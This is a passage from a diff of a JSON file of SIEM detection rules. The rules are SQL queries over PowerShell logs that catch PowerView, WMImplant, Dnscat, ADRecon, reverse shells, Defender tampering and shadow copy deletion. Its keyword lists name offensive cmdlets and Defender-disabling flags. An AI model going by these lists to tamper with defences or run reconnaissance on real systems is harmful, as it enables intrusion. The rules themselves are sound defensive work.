'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" - ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" - }, - { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055", - "attack.execution", - "attack.t1059.001" + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", @@ -4019,52 +3939,32 @@ "filename": "posh_ps_psasyncshell.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate PowerShell scripts" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" - ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" - }, - { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", - "status": "test", - "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", - "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "title": "Malicious ShellIntel PowerShell Commandlets", + "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "status": "test", + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", "attack.t1059.001" ], @@ -4073,9 +3973,9 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": "posh_ps_shellintel_malicious_commandlets.yml" }, { "title": "Potential WinAPI Calls Via PowerShell Scripts", @@ -4098,1569 +3998,1501 @@ "filename": "posh_ps_accessing_win_api.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate script" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Malicious PowerView PowerShell Commandlets", - "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "status": "experimental", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + "filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "title": "WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.exfiltration", - "attack.t1048", "attack.execution", + "attack.t1047", "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + "Administrative scripts that use the same keywords." ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" ], - "filename": "posh_ps_dnscat_execution.yml" + "filename": "posh_ps_wmimplant.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", + "author": "frack113", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", - "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" - ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" - }, - { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", - "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.credential_access", - "attack.t1556.002" - ], - "falsepositives": [ - "Unknown" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": 